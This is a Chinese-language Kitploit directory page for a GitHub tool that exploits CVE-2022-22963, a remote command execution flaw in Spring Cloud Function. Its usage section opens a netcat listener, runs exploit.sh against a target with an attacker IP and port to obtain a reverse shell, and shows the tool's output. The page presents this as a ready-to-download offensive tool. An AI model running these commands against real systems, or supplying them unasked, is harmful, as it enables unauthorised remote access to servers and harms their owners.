Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
RCE-in-Spring-Cloud-CVE-2022-22963 — CVE-2022-22963 Spring Cloud Function 远程命令执行利用工具 | Kitploit
工具/GitHubGitHub/nikn0laty/rce-in-spring-cloud-cve-2022-22963
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试远程访问工具
GitHubnikn0laty/rce-in-spring-cloud-cve-2022-22963

RCE-in-Spring-Cloud-CVE-2022-22963

CVE-2022-22963 Spring Cloud Function 远程命令执行利用工具

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
113年前尚未审核
分享

Spring Cloud RCE 漏洞利用工具 (CVE-2022-22963)

用于 CVE-2022-22963 远程命令执行的 Spring Cloud Function 漏洞利用工具

关于此漏洞的详细信息,请参见此处和此处

PoC

在你的主机上运行 netcat:

root@kitploit:~
$ nc -lvnp 9001

在攻击者主机上使用默认端口 9001 运行漏洞利用工具(示例):

root@kitploit:~
$ ./exploit.sh site.com 10.10.14.122
---[Reverse Shell Exploit for CVE-2022-22963 (RCE in Spring Cloud Function)]---
[*] Input target is site.com
[*] Input attacker is 10.10.14.122:9001
[*] Done

在攻击者主机上使用指定端口 1337 运行漏洞利用工具(示例):

root@kitploit:~
$ ./exploit.sh site.com 10.10.14.122 1337
---[Reverse Shell Exploit for CVE-2022-22963 (RCE in Spring Cloud Function)]---
[*] Input target is site.com
[*] Input attacker is 10.10.14.122:1337
[*] Done
下载工具